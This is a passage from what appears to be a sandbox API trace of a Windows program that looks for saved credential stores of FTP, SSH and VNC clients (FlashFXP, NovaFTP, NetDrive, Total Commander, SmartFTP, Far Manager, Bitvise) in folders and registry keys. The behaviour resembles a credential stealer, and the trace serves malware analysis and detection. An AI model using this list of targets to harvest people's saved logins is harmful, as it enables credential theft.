Flags=0x0, Size=0x3f56) returned 0x6bb668 [0129.004] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.005] wvsprintfW (in: param_1=0x6bb668, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0129.005] GetProcessHeap () returned 0x6a0000 [0129.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x32) returned 0x6ad420 [0129.005] GetProcessHeap () returned 0x6a0000 [0129.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb668 | out: hHeap=0x6a0000) returned 1 [0129.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.014] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0129.015] GetProcessHeap () returned 0x6a0000 [0129.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.015] GetProcessHeap () returned 0x6a0000 [0129.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ad420 | out: hHeap=0x6a0000) returned 1 [0129.015] GetProcessHeap () returned 0x6a0000 [0129.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.015] GetProcessHeap () returned 0x6a0000 [0129.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x6a0000) returned 1 [0129.016] GetProcessHeap () returned 0x6a0000 [0129.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.016] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.017] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0129.017] GetProcessHeap () returned 0x6a0000 [0129.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6bb458 [0129.018] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.019] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\INSoftware\\NovaFTP\\NovaFTP.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 65 [0129.019] GetProcessHeap () returned 0x6a0000 [0129.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x86) returned 0x6bae40 [0129.019] GetProcessHeap () returned 0x6a0000 [0129.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.020] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\INSoftware\\NovaFTP\\NovaFTP.db") returned 0 [0129.021] GetProcessHeap () returned 0x6a0000 [0129.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae40 | out: hHeap=0x6a0000) returned 1 [0129.021] GetProcessHeap () returned 0x6a0000 [0129.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.022] GetProcessHeap () returned 0x6a0000 [0129.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6bb458 [0129.023] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.024] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NetDrive\\NDSites.ini", arglist=0x19fb9c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 58 [0129.024] GetProcessHeap () returned 0x6a0000 [0129.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x78) returned 0x6b80e0 [0129.024] GetProcessHeap () returned 0x6a0000 [0129.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.026] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive\\NDSites.ini") returned 0 [0129.026] GetProcessHeap () returned 0x6a0000 [0129.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b80e0 | out: hHeap=0x6a0000) returned 1 [0129.027] GetProcessHeap () returned 0x6a0000 [0129.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6bb458 [0129.028] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.029] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 58 [0129.029] GetProcessHeap () returned 0x6a0000 [0129.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x78) returned 0x6b87e0 [0129.029] GetProcessHeap () returned 0x6a0000 [0129.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.031] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetDrive2\\drives.dat") returned 0 [0129.031] GetProcessHeap () returned 0x6a0000 [0129.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b87e0 | out: hHeap=0x6a0000) returned 1 [0129.032] GetProcessHeap () returned 0x6a0000 [0129.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.033] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.033] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\ProgramData") returned 0x0 [0129.033] GetProcessHeap () returned 0x6a0000 [0129.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6bb458 [0129.034] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.035] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\NetDrive2\\drives.dat", arglist=0x19fb84 | out: param_1="C:\\ProgramData\\NetDrive2\\drives.dat") returned 35 [0129.035] GetProcessHeap () returned 0x6a0000 [0129.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6b9518 [0129.035] GetProcessHeap () returned 0x6a0000 [0129.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.038] PathFileExistsW (pszPath="C:\\ProgramData\\NetDrive2\\drives.dat") returned 0 [0129.038] GetProcessHeap () returned 0x6a0000 [0129.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0129.038] GetProcessHeap () returned 0x6a0000 [0129.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.039] GetProcessHeap () returned 0x6a0000 [0129.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.040] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.040] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Windows") returned 0x0 [0129.040] GetProcessHeap () returned 0x6a0000 [0129.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5c) returned 0x6bb458 [0129.041] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.042] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\wcx_ftp.ini", arglist=0x19fb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0129.042] GetProcessHeap () returned 0x6a0000 [0129.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x6b7658 [0129.042] GetProcessHeap () returned 0x6a0000 [0129.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.044] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0129.044] GetProcessHeap () returned 0x6a0000 [0129.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7658 | out: hHeap=0x6a0000) returned 1 [0129.044] GetProcessHeap () returned 0x6a0000 [0129.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.045] GetProcessHeap () returned 0x6a0000 [0129.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5c) returned 0x6bb458 [0129.046] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.047] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\wcx_ftp.ini", arglist=0x19fb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0129.047] GetProcessHeap () returned 0x6a0000 [0129.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x66) returned 0x6b9518 [0129.047] GetProcessHeap () returned 0x6a0000 [0129.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.048] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0129.049] GetProcessHeap () returned 0x6a0000 [0129.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0129.049] GetProcessHeap () returned 0x6a0000 [0129.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.056] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.056] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0129.056] GetProcessHeap () returned 0x6a0000 [0129.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5c) returned 0x6bb458 [0129.057] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.058] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\wcx_ftp.ini", arglist=0x19fb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0129.058] GetProcessHeap () returned 0x6a0000 [0129.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x46) returned 0x6b5560 [0129.058] GetProcessHeap () returned 0x6a0000 [0129.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.061] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0129.061] GetProcessHeap () returned 0x6a0000 [0129.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5560 | out: hHeap=0x6a0000) returned 1 [0129.061] GetProcessHeap () returned 0x6a0000 [0129.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.062] GetProcessHeap () returned 0x6a0000 [0129.062] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6c) returned 0x6bb458 [0129.063] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.063] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0129.064] GetProcessHeap () returned 0x6a0000 [0129.064] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x6b8b60 [0129.064] GetProcessHeap () returned 0x6a0000 [0129.064] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.066] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0129.066] GetProcessHeap () returned 0x6a0000 [0129.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8b60 | out: hHeap=0x6a0000) returned 1 [0129.066] GetProcessHeap () returned 0x6a0000 [0129.066] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0129.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.068] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb74*=0x104) returned 0x2 [0129.068] GetProcessHeap () returned 0x6a0000 [0129.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.068] GetProcessHeap () returned 0x6a0000 [0129.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.069] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.069] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0129.070] GetProcessHeap () returned 0x6a0000 [0129.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f56) returned 0x6bb458 [0129.071] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.072] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\SmartFTP", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 46 [0129.072] GetProcessHeap () returned 0x6a0000 [0129.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x6b9518 [0129.072] GetProcessHeap () returned 0x6a0000 [0129.072] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.073] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SmartFTP") returned 0 [0129.074] GetProcessHeap () returned 0x6a0000 [0129.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.074] GetProcessHeap () returned 0x6a0000 [0129.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0129.074] GetProcessHeap () returned 0x6a0000 [0129.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e8) returned 0x6bac30 [0129.074] GetProcessHeap () returned 0x6a0000 [0129.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6ab3d0 [0129.074] GetProcessHeap () returned 0x6a0000 [0129.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0129.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.076] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far\\Plugins\\FTP\\Hosts", phkResult=0x6ba970 | out: phkResult=0x6ba970*=0x0) returned 0x2 [0129.076] GetProcessHeap () returned 0x6a0000 [0129.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0129.076] GetProcessHeap () returned 0x6a0000 [0129.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0129.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0129.078] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Far2\\Plugins\\FTP\\Hosts", phkResult=0x6baa70 | out: phkResult=0x6baa70*=0x0) returned 0x2 [0129.078] GetProcessHeap () returned 0x6a0000 [0129.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0129.078] GetProcessHeap () returned 0x6a0000 [0129.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.078] GetProcessHeap () returned 0x6a0000 [0129.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x6a0000) returned 1 [0129.078] GetProcessHeap () returned 0x6a0000 [0129.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3fd4) returned 0x6bb458 [0129.079] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.080] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 109 [0129.080] GetProcessHeap () returned 0x6a0000 [0129.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xde) returned 0x6bac30 [0129.080] GetProcessHeap () returned 0x6a0000 [0129.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.082] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db") returned 0 [0129.083] GetProcessHeap () returned 0x6a0000 [0129.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.083] GetProcessHeap () returned 0x6a0000 [0129.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.096] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.097] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0129.098] Sleep (dwMilliseconds=0xa) [0129.115] GetProcessHeap () returned 0x6a0000 [0129.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0129.115] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.116] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f90c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp") returned 37 [0129.116] GetProcessHeap () returned 0x6a0000 [0129.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4e) returned 0x6b9518 [0129.116] GetProcessHeap () returned 0x6a0000 [0129.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.118] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.tlp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.tlp"), lpFindFileData=0x19f920 | out: lpFindFileData=0x19f920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6a78a0, nFileSizeHigh=0x6b4588, nFileSizeLow=0x6b4ab8, dwReserved0=0x0, dwReserved1=0x19f97c, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩ﮍ⬤ﮄ\x19䂑@")) returned 0xffffffff [0129.118] GetProcessHeap () returned 0x6a0000 [0129.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0129.119] GetProcessHeap () returned 0x6a0000 [0129.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.119] GetProcessHeap () returned 0x6a0000 [0129.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.127] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.127] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0129.128] Sleep (dwMilliseconds=0xa) [0129.159] GetProcessHeap () returned 0x6a0000 [0129.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0129.160] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.161] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f8f4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp") returned 38 [0129.161] GetProcessHeap () returned 0x6a0000 [0129.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x6b9518 [0129.161] GetProcessHeap () returned 0x6a0000 [0129.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.162] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.bscp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.bscp"), lpFindFileData=0x19f908 | out: lpFindFileData=0x19f908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6a78a0, nFileSizeHigh=0x6b4588, nFileSizeLow=0x6b47a0, dwReserved0=0x0, dwReserved1=0x19f964, cFileName="ը瞆", cAlternateFileName="뒭蕬͈읩﮵⬤ﭬ\x19䂑@")) returned 0xffffffff [0129.162] GetProcessHeap () returned 0x6a0000 [0129.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0129.163] GetProcessHeap () returned 0x6a0000 [0129.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.164] GetProcessHeap () returned 0x6a0000 [0129.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x410) returned 0x6bac30 [0129.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0129.165] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Bitvise\\BvSshClient", pszValue="LastUsedProfile", pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb74*=0x104 | out: pdwType=0x0, pvData=0x6bac30, pcbData=0x19fb74*=0x104) returned 0x2 [0129.165] GetProcessHeap () returned 0x6a0000 [0129.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.166] GetProcessHeap () returned 0x6a0000 [0129.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.167] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.167] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0129.169] Sleep (dwMilliseconds=0xa) [0129.224] GetProcessHeap () returned 0x6a0000 [0129.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0129.225] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.226] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f900 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc") returned 37 [0129.226] GetProcessHeap () returned 0x6a0000 [0129.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4e) returned 0x6b9518 [0129.226] GetProcessHeap () returned 0x6a0000 [0129.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.227] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.vnc"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6a78a0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6b4588, nFileSizeHigh=0x6b49e0, nFileSizeLow=0x0, dwReserved0=0x19f96c, dwReserved1=0x77860568, cFileName="", cAlternateFileName="͈읩﮽⬤")) returned 0xffffffff [0129.240] GetProcessHeap () returned 0x6a0000 [0129.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9518 | out: hHeap=0x6a0000) returned 1 [0129.241] GetProcessHeap () returned 0x6a0000 [0129.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bac30 | out: hHeap=0x6a0000) returned 1 [0129.242] GetProcessHeap () returned 0x6a0000 [0129.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bac30 [0129.244] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0129.244] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6bac30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0129.248] Sleep (dwMilliseconds=0xa) [0129.260] GetProcessHeap () returned 0x6a0000 [0129.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bb458 [0129.261] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0129.262] wvsprintfW (in: param_1=0x6bb458, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc") returned 35 [0129.262] GetProcessHeap () returned 0x6a0000 [0129.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4a) returned 0x6bae98 [0129.262] GetProcessHeap () returned 0x6a0000 [0129.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0129.263] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.vnc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.vnc"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x20000, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x6a78a0, ftLastWriteTime.dwLowDateTime=0x6a78a0, ftLastWriteTime.dwHighDateTime=0x6b4588, nFileSizeHigh=0x6b4c20, nFileSizeLow=0x0, dwReserved0=0x19f954, dwReserved1=0x77860568, cFileName="", cAlternateFileName="螚䇆ﮥ⬤")) returned 0xffffffff [0129.263] GetProcessHeap () returned 0x6a0000 [0129.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0129.264] GetProcessHeap () returned 0x6a0000 [0129.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 